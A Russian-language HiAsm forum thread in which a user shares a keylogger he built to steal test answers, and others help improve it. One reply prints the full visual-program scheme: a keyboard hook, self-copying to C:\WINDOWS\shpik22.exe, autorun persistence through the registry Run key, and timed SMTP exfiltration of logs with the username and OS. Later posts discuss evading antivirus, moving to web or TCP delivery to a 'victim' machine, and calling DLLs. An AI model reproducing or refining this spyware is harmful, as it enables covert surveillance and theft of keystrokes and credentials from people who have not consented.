HiAsm
HiAsm
Вверх ↑
ФорумыПомощь по пакетуПростой keylogger ← Ctrl1Ctrl →
Этот топик читают: Гость
Ответов: 74
Рейтинг: 2
#1: 2014-05-06 15:17:53 ЛС | профиль | цитата
Привет ребята!.
Уже как давно (ещо когда учился) делал keylogger ,нужно было знать правильные ответы на тесты))) кто студет или был им тот понимает)...
Вобщем то все нормально работает, отлавливает нажатия на клавиатуре и отправляет их по майл..НО отправляет в виде кодов клавиш Esc-27, Enter-13 ... вот и пришлось писать ещо и дешифраторы для русского и английского языка .. Но это неудобно, вот и хочу как то отправлять уже непосредственно сам текст а не логи клавиш
но знаний не хватает(( не получаеться красиво отправлять тексты, цыкл запускающий розшифровку сильно нагружает ОП, что не есть гуд ..Прошу помощи, идей. Думаю многим интерасная такая программка ..В администраторов сразу прошу прощения если что то нарушаю так как кейлогер и так дале.. Он безвредный так как палиться антивиросами .. Спасибо.
Вот сам кейлогер (для проверки нужно ввести два ящика с которого будет отправляться и куда будет идти)
code_33560.txt
карма: 0

0
файлы: 1code_33560.txt [7.1KB] [211]
Ответов: 1343
Рейтинг: 31
#2: 2014-05-06 20:49:56 ЛС | профиль | цитата
[flood]блин как похожа схема на все мои, прям всё разбросано, всё так красиво
сразу всё полятно и видно чё где и как [/flood]
------------ Дoбавленo в 20.43:
Add(MainForm,2953706,21,105)
{
}
Add(Service,11146606,77,175)
{
 Wait=0
 link(onStart,13832133:doEvent1,[])
}
Add(Timer,162546,378,217)
{
 Interval=30000
 link(onTimer,393213:doSave,[])
}
Add(MultiElement,96426,77,224)
{
 @Hint=#16:а б?а ТЕаЁа?а ТЕ|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|
 link(onEvent1,14071432:doEvent1,[])
 link(onEvent2,4365907:doCompare,[(219,237)(219,265)])
}
BEGIN_SDK
  Add(EditMulti,77305,45,10)
  {
   EventCount=2
   Width=692
   Height=417
  }
  Add(Keyboard,25118,210,112)
  {
   link(onReadKey,71116:doCompare,[])
  }
  Add(Hub,61803,364,231)
  {
   InCount=3
   link(onEvent1,31459:doWork1,[(406,237)(406,188)(116,188)(116,111)])
  }
  Add(MultiElement,31459,84,105)
  {
   @Hint=#8:а а?аЁт?|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|
   link(onEvent1,25620:doCompare,[])
  }
  BEGIN_SDK
    Add(EditMulti,48633,3,3)
    {
     EventCount=1
     WorkCount=2
     VarCount=1
     Width=461
     Height=228
     link(doWork1,22004:doData,[(29,9)(29,125)])
     link(doWork2,26220:doClear,[(68,16)(68,69)])
     link(Var1,88176:Result,[(9,160)(265,160)])
    }
    Add(Memory,26220,133,56)
    {
     @Hint=#19:а б?а ТАаЁт?Ёа ТАа |0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|
     Default=Integer(0)
    }
    Add(InfoTip,54782,497,7)
    {
     Info=#10:а а?аЁт?Ёа|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|
     Font=[Arial,8,0,0,1]
     Width=190
     Height=235
    }
    Add(Memory,5266,133,7)
    {
     @Hint=#18:а б?а б?а а?а ТЕаЁ|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|
     Default=Integer(256)
    }
    Add(Hub,25945,322,56)
    {
     link(onEvent1,26220:doValue,[(364,62)(364,46)(123,46)(123,62)])
     link(onEvent2,48633:onEvent1,[(402,69)(402,9)])
    }
    Add(DoData,22004,133,119)
    {
     @Hint=#33:а а?аЁа?аЁт??а ТАа а?а ТАа а?а ТЛ|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|
     link(onEventData,34633:doCompare,[(180,125)(180,62)])
     link(Data,26220:Value,[(139,104)(139,104)])
    }
    Add(Math,88176,259,56)
    {
     @Hint=#27:а  а ТЕа б?а ТЕа а?а б?аЁа?|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|
     ResultType=0
     link(onResult,25945:doEvent1,[])
     link(Op2,40715:Value,[(272,48)(258,48)])
    }
    Add(Memory,40715,252,7)
    {
     @Hint=#4:а а?|0:|0:|0:|0:|0:|0:|0:|0:|0:|
     Default=Integer(1)
    }
    Add(If_else,34633,196,56)
    {
     @Hint=#38:а б?аЁа?а б?а а?а ТЕаЁа?а б?а ТА а б?а|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|0:|
     Type=1
     link(onTrue,88176:doOperation,[])
     link(Op2,5266:Value,[(209,48)(139,48)])
    }
  END_SDK
  Add(DoData,13463,413,112)
  {
   link(onEventData,90968:doEvent1,[])
   link(Data,31459:Var1,[(419,102)(303,102)(303,154)(90,154)])
  }
  Add(If_else,2450,567,84)
  {
   Type=5
   Op2=Integer(16)
   link(onTrue,29951:doCompare,[(611,90)(611,136)(555,136)(555,181)])
  }
  Add(If_else,71116,273,112)
  {
   Op2=Integer(1)
   link(onTrue,6385324:doEvent1,[])
   link(onFalse,15536618:doEvent1,[(324,125)(324,167)])
  }
  Add(Hub,90968,483,112)
  {
   link(onEvent1,2450:doCompare,[(532,118)(532,90)])
   link(onEvent2,61803:doEvent2,[(531,125)(531,299)(341,299)(341,244)])
  }
  Add(If_else,39824,567,259)
  {
   Type=5
   Op2=Integer(18)
   link(onTrue,77305:onEvent1,[(668,265)(668,16)])
  }
  Add(If_else,25620,147,105)
  {
   Op2=Integer(256)
   link(onTrue,12229839:doEvent1,[(184,111)(184,69)])
   link(onFalse,25118:doReadKey,[])
  }
  Add(If_else,29951,567,175)
  {
   Type=5
   Op2=Integer(17)
   link(onTrue,39824:doCompare,[(611,181)(611,223)(555,223)(555,265)])
  }
  Add(Timer,80683,147,245)
  {
   Interval=20
   link(onTimer,61803:doEvent3,[])
  }
  Add(Hub,15536618,336,161)
  {
   link(onEvent2,61803:doEvent1,[(383,174)(383,206)(352,206)(352,237)])
  }
  Add(Hub,12229839,189,63)
  {
   OutCount=3
   link(onEvent1,31459:doWork2,[(215,69)(215,93)(72,93)(72,118)])
   link(onEvent2,5790693:doCompare,[])
   link(onEvent3,6651940:doData,[(227,83)(227,41)])
  }
  Add(EventFromData,2962712,399,21)
  {
  }
  Add(If_else,5790693,392,70)
  {
   Op1=Integer(1)
   link(onTrue,8682517:doReset,[])
   link(onFalse,8682517:doOn,[])
   link(Op2,2962712:GetData,[])
  }
  Add(DoData,6651940,252,35)
  {
   Data=Integer(0)
   link(onEventData,2226032:doWork2,[])
  }
  Add(HubEx,2226032,381,35)
  {
   Angle=3
   link(onEvent,2962712:doData,[(385,27)])
  }
  Add(Hub,6385324,343,112)
  {
   link(onEvent1,13463:doData,[])
   link(onEvent2,2226032:doWork1,[(393,125)(393,41)])
  }
  Add(Switch,8682517,455,63)
  {
   DataOn=Integer(1)
   Point(doOn)
   Point(onOn)
   link(onOn,77305:onEvent2,[(612,76)(612,23)])
  }
END_SDK
Add(DoData,2705250,378,182)
{
 link(onEventData,8217039:doConvert,[])
 link(Data,7846355:Var3,[(384,159)])
}
Add(Memory,6950845,294,105)
{
 link(onData,12626607:doCompare,[(345,111)(345,143)(275,143)(275,174)])
}
Add(If_else,12626607,287,168)
{
 link(onFalse,1332154:doWork2,[])
 link(Op1,4271762:Var2,[(293,156)(251,156)])
 link(Op2,11350174:Var2,[])
}
Add(EventFromData,15737734,189,224)
{
}
Add(GetDataEx,11350174,294,154)
{
 link(Data,6950845:Value,[])
}
Add(If_else,4365907,315,259)
{
 link(onTrue,1332154:doWork3,[(359,265)])
 link(Op1,4271762:Var3,[(321,250)])
 link(Op2,7846355:Var2,[])
}
Add(GetDataEx,4271762,245,245)
{
 Angle=2
 link(Data,15737734:GetData,[(251,268)(195,268)])
}
Add(HubEx,1332154,355,175)
{
 link(onEvent,2705250:doData,[(369,181)(369,188)])
}
Add(GetDataEx,7846355,322,154)
{
 Angle=3
 link(Data,11350174:Var3,[])
}
Add(Application,13151115,91,273)
{
}
Add(Registry,4176373,189,175)
{
 HKey=2
 Key="SOFTWAREMicrosoftWindowsCurrentVersionRun"
 Value="а Ҙа б˜аЁа?"
 NotEmpty=1
 Point(doDeleteValue)
 Point(onExistsValue)
 Point(doExistsValue)
 link(Data,923240:Value,[(195,165)(192,165)])
}
Add(Hub,13832133,126,175)
{
 OutCount=5
 link(onEvent1,4176373:doWrite,[(164,181)(164,188)])
 link(onEvent2,4176373:doExistsValue,[(164,188)(164,202)])
 link(onEvent3,1449114:doMove,[(152,195)(152,265)(79,265)(79,335)])
 link(onEvent4,6860764:doLoad,[(294,202)(294,139)])
}
Add(StrList,393213,490,182)
{
 link(FileName,6860764:Str,[(503,174)(510,174)])
}
Add(Time,9291613,497,84)
{
 Format="C:LOGI D-M-Y__h-m-s.txt"
}
Add(Timer,3760346,378,252)
{
 Interval=18000
 link(onTimer,14203888:doSend,[])
}
Add(SMTP,14203888,490,252)
{
 Port=587
 Point(Attach)
 link(Subject,4605350:FString,[(517,240)(538,240)(538,275)(615,275)])
 link(Body,393213:Text,[(524,240)(496,240)])
}
Add(Hub,14071432,133,224)
{
 InCount=2
 link(onEvent1,15737734:doData,[])
 link(onEvent2,6950845:doValue,[(231,237)(231,111)])
}
Add(FileTools,1449114,91,329)
{
 link(FileName,13151115:AppFileName,[])
 link(NewFileName,11773491:Value,[(104,322)(143,322)])
}
Add(Memory,11773491,137,270)
{
 Default=String(C:WINDOWSshpik22.exe)
}
Add(Memory,923240,186,123)
{
 Default=String(C:WINDOWSshpik22.exe)
}
Add(CharArray,6860764,497,133)
{
 link(String,9291613:FormatTime,[])
}
Add(ComputerInfo,11471947,609,105)
{
 WinInfoMask="Windows %n %o"
}
Add(FormatStr,4605350,609,168)
{
 Mask="%1 [OS]%2"
 Point(FString)
 link(Str1,11471947:UserName,[])
 link(Str2,11471947:WinInfo,[(622,160)(636,160)])
}
Add(Timer,14225456,543,172)
{
 Interval=0
 link(onTimer,4605350:doString,[(585,178)(585,174)])
}
Add(Convertor,8217039,441,182)
{
 Mode=4
 link(onResult,393213:doAdd,[])
}

вот там всего то как я понял надо один конвертер добавить
правда энкодит только в Eng, но можно прикрутить переводчик (компонент Charset параметр кодировки EN_RU)
НО большое но, поверь лучше всё же оставить Int вариант потому, что текст иногда чёрт знает как переводит (энкодит)
------------ Дoбавленo в 20.49:
Bigggi писал(а):
Он безвредный так как палиться антивиросами


ага ещё как палится , но почему он безвредным то стал вдруг?
карма: 2

0
Ответов: 16884
Рейтинг: 1239
#3: 2014-05-07 10:08:38 ЛС | профиль | цитата
Только без обид.
1.
Bigggi писал(а):
Уже как давно (ещо когда учился)
Хреново учился.
2.
Rysik писал(а):
блин как похожа схема на все мои
яке їхало - таке i здибало
3. Михаил Шестов - рекордсмен по скорости набора текста на клавиатуре, печатает со скоростью 940 знаков/минуту.
Это 15 знаков/сек.
Это 66 мсек/знак.
Вопрос: зачем нужен 20-миллисекундный таймер ?
4.Зачем, кому и для чего нужна проверка на doExistsValue ?

5. Про идиотизм с применением EventFromData писано уже не раз.
6. И т.д и т.п.
карма: 25
Немного терпения! Дежурный экстрасенс скоро свяжется с Вами!
0
файлы: 1biggi_1.gif [3.4KB] [496]
Ответов: 74
Рейтинг: 2
#4: 2014-05-07 16:44:30 ЛС | профиль | цитата
Tad
Отвечаю).
Не обижаюсь)
1.Да учился хреново,но хреново в меру) так как был ленивым - а лень двигатель прогресса поетому и было задумано упростить себе и своим одногрупникам жизнь) но это в прошлом,закончил хорошо и слава Богу).

2.Ну я делаю не чтобы красиво было, а чтобы работало хоть приблизительно).И некоторые идеи взяты на просторах этого форума..

3.Такое время таймера подобрал на авось..))

4.Вроде как проверка наличия записаного ключа в реестер, эсли ключ записан ничего не делает, эсли не записан пишет, или я ошибаюсь?.

5. о EventFromData незнаю(.


------------ Дoбавленo в 16.44:
Rysik
оо.. попробую запустить.. Спасибо!)..
ну как ? раз спалился значит безвредный , так как сделать больше ничего не сможет когда Авир. удалит или поместит в карантин, хотя по секрету скажу, каспер пропускал)))
карма: 0

0
Ответов: 16884
Рейтинг: 1239
#5: 2014-05-07 17:13:13 ЛС | профиль | цитата
Bigggi писал(а):
4.Вроде как проверка наличия записаного ключа в реестер, эсли ключ записан ничего не делает, эсли не записан пишет, или я ошибаюсь?.
Ошибаешься.
А вот так будет точно по твоему описанию (сначала ПРОВЕРКА, потом ЕСЛИ)
code_33562.txt

карма: 25
Немного терпения! Дежурный экстрасенс скоро свяжется с Вами!
0
файлы: 1code_33562.txt [661B] [176]
Ответов: 1343
Рейтинг: 31
#6: 2014-05-07 17:51:15 ЛС | профиль | цитата
Bigggi писал(а):
раз спалился значит безвредный , так как сделать больше ничего не сможет когда Авир. удалит или поместит в карантин, хотя по секрету скажу, каспер пропускал)))


хех тут если убрать почтовик или сделать его через ВЕБ то будет вообще безпалевный

[flood]RMS делал очень функциональный когда то так в ВТ было 0 вирусов в сервере , щас правда вирусы есть но и функционал гораздо больше и соплей меньше, но самое то главное что норм антивири не палят[/flood]

а если будешь делать всё через DLL windows, то считай соберёшь настоящую вещичку, к тому же недавно сделали компонент очень полезный CallDLLEX
карма: 2

0
Ответов: 74
Рейтинг: 2
#7: 2014-05-07 19:01:11 ЛС | профиль | цитата
Rysik уже интересно) убрать почтовик не получиться.. нужна полюбому связь ) поподробней о замене на Веб..
и подробно о dll если можно) ... кста.. о конвертере при записи в файл все работает как нужно ) но вот на почту почему то получаю хрень))

п.с. немогу написать в ЛС ((
карма: 0

0
Гость
Ответов: 17029
Рейтинг: 0
#8: 2014-05-08 08:06:44 правка | ЛС | профиль | цитата


Редактировалось 2 раз(а), последний 2025-01-10 15:42:56
карма: 0

0
Ответов: 74
Рейтинг: 2
#9: 2014-05-08 16:45:23 ЛС | профиль | цитата
78.25.122.187

хтел делать через tcp ,но доконца не понимаю.. создал сервер и клиента .. на одном компе программа работает а вот если закинуть сервер на комп жертву немогу сконектиться ... думаю это из за того что незнаю как там быть с ip адресом вот примеры как пытался сделать
сервер
code_33574.txt

колиент
code_33575.txt

так же хотел слать файл на почту но не получалось.. всегда почему то письмо приходило пустое(
карма: 0

0
файлы: 2code_33574.txt [447B] [112], code_33575.txt [866B] [141]
Ответов: 1343
Рейтинг: 31
#10: 2014-05-09 08:35:46 ЛС | профиль | цитата
напиши свой скайп ...

извиняюсь за вопрос не в тему, но он в ЛС не умеет смотреть
карма: 2

0
Ответов: 74
Рейтинг: 2
#11: 2014-05-12 14:12:37 ЛС | профиль | цитата
Скайп bigggi1993
карма: 0

0
11
ФорумыПомощь по пакетуПростой keylogger ← Ctrl1Ctrl →
Сообщение
...
Прикрепленные файлы
(файлы не залиты)
HiAsm Studio 2003 - 2025
Пользовательское соглашение | support@hiasm.com
Яндекс.Метрика